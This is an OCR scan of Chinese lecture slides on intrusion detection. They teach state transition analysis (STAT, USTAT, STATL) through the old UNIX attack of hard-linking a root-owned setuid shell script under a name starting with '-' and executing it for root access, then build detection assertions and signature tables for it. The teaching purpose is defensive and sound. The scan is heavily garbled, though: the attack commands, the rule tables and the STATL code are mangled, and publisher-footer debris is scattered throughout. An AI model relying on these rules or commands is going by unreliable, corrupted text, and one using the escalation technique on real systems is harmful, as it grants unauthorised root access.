的狀態(tài)轉(zhuǎn)移圖的表示方法。

對于每個狀態(tài)結(jié)點，都對應(yīng)著一組狀態(tài)斷言。

當(dāng)滿足該組斷言后，本次從上個狀態(tài)到本狀態(tài)的轉(zhuǎn)

移過程才成功發(fā)生。狀態(tài)斷言的選擇和關(guān)鍵行為的

選擇一樣，都是構(gòu)成狀態(tài)轉(zhuǎn)移圖的關(guān)鍵所在。

殄人民郵電出版袒入侵檢測流程66

費POSTS&lELECFM

下面以一個簡單的例子來展示狀態(tài)轉(zhuǎn)移圖的構(gòu)成

過程。該例子代表著UNIX環(huán)境下的一次攻擊

行為，其步驟如下：

%Intarget-x

%-x

入侵檢測流程67

多人民郵電出版社

K)SiS&IELECOMPRESS

這里，文件target代表一個setuid的shell腳本，其屬

主為根用戶(root)。文件target中首行包含字符串

“#!/bin/sh”。

上述的攻擊步驟過程說明如下：

①攻擊者對屬主為root且具有setuid特性的shell腳本

target,創(chuàng)建一個硬連接(hard-link)文件，該連接

文件的名稱以字符開頭。

多人民郵電出版社入侵檢測流程68

POS15&1ELECOMPRESS

②攻擊者執(zhí)行該連接文件“-X”。

為了創(chuàng)建對應(yīng)的狀態(tài)轉(zhuǎn)移圖，首先確定在

上述攻擊行為中，必須包含兩個關(guān)鍵的操作行

為：首先是用戶創(chuàng)建一個所需的文件，然后執(zhí)

行這個文件。兩個關(guān)鍵行為可以表示為

“CREATE”和“EXECUTE"。此時，對應(yīng)的不

完整狀態(tài)轉(zhuǎn)移圖如圖所示。

多人民郵電出版社入侵檢測流程69

費POSTS&1ELECCMPRESS

CreateFileExecuteFile

圖構(gòu)建狀態(tài)轉(zhuǎn)移圖Step-1

第二步，確定這些關(guān)鍵操作所引起的狀態(tài)變

化。對于第一個操作而言，并不需要任何前提狀態(tài)

條件，因此初始狀態(tài)為NULL。攻擊者執(zhí)行攻擊步

驟后，最后所導(dǎo)致的最終狀態(tài)是獲得了root的訪問

權(quán)限，即其有效用戶1ID(effectiveuserId)變?yōu)?/p>

rooto所以，最終狀態(tài)可以采用下面的斷言來定

義：

euid(user)=root

殄人民郵電出版袒入侵檢測流程70

費POSTS&lELECFM

接下來的問題就是如何確定中間狀態(tài)，此時就要

用到前述對攻擊過程的分析知識了。

新創(chuàng)建的文件名稱應(yīng)該以開頭，后面接任意字

符串，表示為：

name(file)=-*

新創(chuàng)建的文件與所連接的目標(biāo)文件具有相同的屬主信

息，因此：

owner(file)=root

該連接文件應(yīng)該是一個具備setuid特性的腳本文件，

所以應(yīng)該滿足：

access(file,suid)=true

shell_script(file)=true

最后，顯而易見，該文件屬于連接文件，應(yīng)該滿足：

殄人民郵電出版袒入侵檢測流程71

費POSTS&lELECFM

link(file)=true

的過上面的分析，最終形成的狀態(tài)轉(zhuǎn)移圖如圖所

/J\O

owner(file)=root

access(file,suid)=TRUE

shell_script(file)=TRUE

link(file)=TRUE

圖最終的狀態(tài)轉(zhuǎn)移圖

人民郵電出版社入侵檢測流程72

H)S15&TELECOMPRESS

從上述的分析過程可以看出，構(gòu)建狀態(tài)轉(zhuǎn)移圖的過

程大致分為如下步驟：

①分析具體的攻擊行為，理解內(nèi)在機(jī)理。

②確定攻擊過程中的關(guān)鍵行為點。

③確定初始狀態(tài)和最終狀態(tài)。

④從最終狀態(tài)出發(fā)，逐步確定所需的各個中間狀態(tài)

及其應(yīng)該滿足的狀態(tài)斷言組。

多人民郵電出版社入侵檢測流程73

審計記錄流

1

圖系統(tǒng)架構(gòu)示意圖入侵檢測流程

多人民郵電出版社STAT74

費POSTS&lELECFMPRESS

在圖4-7所示的STAT系統(tǒng)設(shè)計圖中，規(guī)則庫中的狀

態(tài)描述表和特征操作表是系統(tǒng)設(shè)計的核心內(nèi)容之

一。在早期的USTAT原型中，這兩張表都是用文本

文件的方式存儲在永久介質(zhì)上，然后再讀入到內(nèi)存

中形成對應(yīng)的數(shù)據(jù)結(jié)構(gòu)。

在狀態(tài)描述表中，對每個狀態(tài)轉(zhuǎn)移圖，都對應(yīng)一組

狀態(tài)斷言集合；每組斷言集合在文件中以字段串

“SDT；起頭（數(shù)字〃代表第〃個狀態(tài)轉(zhuǎn)移圖），下

接若干行斷言組，形式如下所示：

SDTn

State-listl.

State-list2.

經(jīng)人民郵電出版社入侵檢測流程75

費HISIS&TELECOMPRESS

每個斷言組State-list都包含若干個狀態(tài)斷言，表明

當(dāng)前狀態(tài)的情況。每行以和換行符結(jié)束。狀

態(tài)斷言之間以“$”符號連接表明邏輯“與”關(guān)

系，以符號連接表明邏輯“或”關(guān)系。在斷言

前加上關(guān)鍵字not,則表示對斷言值求反。

STAT的狀態(tài)描述表文件示例如下。

#STATEDESCRIPTIONTABLE

#FOR

#USTAT

#

#

#Unauthorizedaccesstouserprivileges

#StateDescription-1

#

SD1:

name(filel)=¬owner(filel)=USER&permitted(SUID,filel)

&shell_script(filel)&permitted(XGRP,filel)

|permitted(XOTH,file1).

:人民郵電出版社入侵檢測流程76

'K)S15&TELECOMPRESS

noteuid=USER.

#

特征操作表的結(jié)構(gòu)與狀態(tài)描述表類似，對于每個狀

態(tài)轉(zhuǎn)移圖，都對應(yīng)一組特征操作集合，形式如下所

示：

SIGn:

Action1;

Action2;

STAT的特征操作表文件示例如下。

#SIGNATUREACTIONSTABLE

#fbr

#USTAT

#

#Unauthorizedaccesstouserprivileges

#SignatureActions-1

#

SIGI:

hardlink(filel,file2).

Q~VQC11~i~Qfflel).

多人民郵電出版社入侵檢測流程77

rOSTS&TELECOMPRESS

#

#Unauthorizedaccesstouserprivileges

#SignatureActions-2

#

SIG2:

modify_perm(filel).

#

從狀態(tài)描述表和特征操作表的結(jié)構(gòu)可以看出，對于

每組狀態(tài)斷言而言，都對應(yīng)著一組特征操作。兩張

表之間存在著一一對應(yīng)的關(guān)系，其中每個特征操作

都對應(yīng)著用來表明某一個狀態(tài)的一組狀態(tài)斷言。

在后繼的STAT版本中，采用了STATL語言來描述

每一種攻擊過程所代表的狀態(tài)轉(zhuǎn)移圖。STATL語言

具備自己的語法和語義定義，但是其中最核心的概

念定義還是兩個：狀態(tài)和轉(zhuǎn)移。下面給出一個用

STATL語言表示攻擊過程的簡化例子。

殄人民郵電出版袒入侵檢測流程78

費POSTS&lELECFM

Scenarioexample

constintthreshold=64;

intcounter;

initial

statesi{}

states2

(

counter>threshold

{log("counteroverthreshold!!");}

transitiontl(sl->s2)

(

[READr]:r.euid!=r.uid

)

人民郵電出版社入侵檢測流程79

H)S15&TELECOMPKKSS

上例中，關(guān)鍵字Scenario定義了一個攻擊場景

example（即對應(yīng)一個STD）,其中包括兩個狀態(tài)

定義si和s2,以及一個轉(zhuǎn)移定義tl（從狀態(tài)si到狀

態(tài)s2的轉(zhuǎn)移）。STATL語言中規(guī)定必須定義一個初

始狀態(tài)，這里為si。狀態(tài)s2中存在一個斷言，而在

轉(zhuǎn)移tl中定義了一個特征操作r,并且要滿足特定條

件。

多人民郵電出版社入侵檢測流程80

POSTS&TELECOMPRESS

有色Petri網(wǎng)方法

開始狀態(tài)結(jié)束狀態(tài)

startaftersynafter_syn+ackafterack

多人民郵電出版社入侵檢測流程81

費IELECCMPKE5S

異常入侵檢測模型

口人民郵電出版衽入侵檢測流程82

rOSTS&TELECOMPRESS

異常檢測

異常檢測模型

:人民郵電出版社入侵檢測流程83

rOSTS&TELECOM